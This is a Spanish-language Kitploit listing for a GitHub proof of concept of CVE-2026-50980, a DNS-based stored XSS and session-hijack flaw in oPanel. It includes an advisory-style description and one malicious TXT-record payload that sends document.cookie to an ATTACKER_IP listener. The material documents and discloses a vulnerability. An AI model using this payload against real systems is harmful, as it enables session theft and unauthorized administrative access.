Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2026-50980 — oPanel Cross-Site Scripting (XSS) Basado en DNS y Secuestro de Sesión | Kitploit
Herramientas/GitHubGitHub/bugresearch/cve-2026-50980
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebSeguridad WebAnálisis de DNS
GitHubbugresearch/cve-2026-50980

CVE-2026-50980

oPanel Cross-Site Scripting (XSS) Basado en DNS y Secuestro de Sesión

Ver Repositorio
hace 1 mesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2026-50980: Cross-Site Scripting (XSS) basado en DNS y secuestro de sesión en oPanel

Resumen

  • ID de CVE: CVE-2026-50980
  • Producto: oPanel
  • Versiones afectadas: < v1.20.25
  • Tipo de vulnerabilidad: Cross-Site Scripting (XSS) almacenado vía DNS / Secuestro de sesión
  • Severidad: Alta (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:N)

Descripción

Existe una vulnerabilidad de Cross-Site Scripting (XSS) en oPanel (versiones anteriores a v1.20.25) debido al manejo y saneamiento inadecuado de las respuestas DNS. Cuando el panel realiza una consulta DNS (por ejemplo, obteniendo información de dominio, verificando la propagación DNS o consultando registros TXT) contra un servidor de nombres controlado por un atacante, refleja los registros DNS devueltos directamente en la interfaz web sin una codificación HTML adecuada.

Un atacante puede explotar esto configurando un servidor DNS malicioso para que responda a las consultas de registros TXT con una carga útil de JavaScript maliciosa. Cuando un usuario autenticado de oPanel (por ejemplo, un administrador) visualiza la página donde se muestra la respuesta DNS, la carga útil se ejecuta en el contexto de su sesión de navegador.

Impacto

La explotación exitosa permite a un atacante ejecutar JavaScript arbitrario en el navegador de la víctima. Como se demuestra en la Prueba de Concepto, esto puede aprovecharse para robar cookies de autenticación sensibles (document.cookie), lo que lleva a un secuestro completo de sesión y acceso administrativo no autorizado al entorno de oPanel.

Prueba de Concepto (PoC)

La explotación requiere que el atacante configure un servidor DNS malicioso y un listener HTTP para capturar los datos exfiltrados.

1. Configuración de la infraestructura del atacante

El atacante ejecuta un servidor DNS malicioso en el puerto UDP 53 que está configurado para responder a cualquier consulta TXT con una carga útil XSS.

Carga útil del registro TXT malicioso:

root@kitploit:~
<script>new Image().src='http://<ATTACKER_IP>:<HTTP_PORT>/log?cookie='+document.cookie;</script>
Descargar herramienta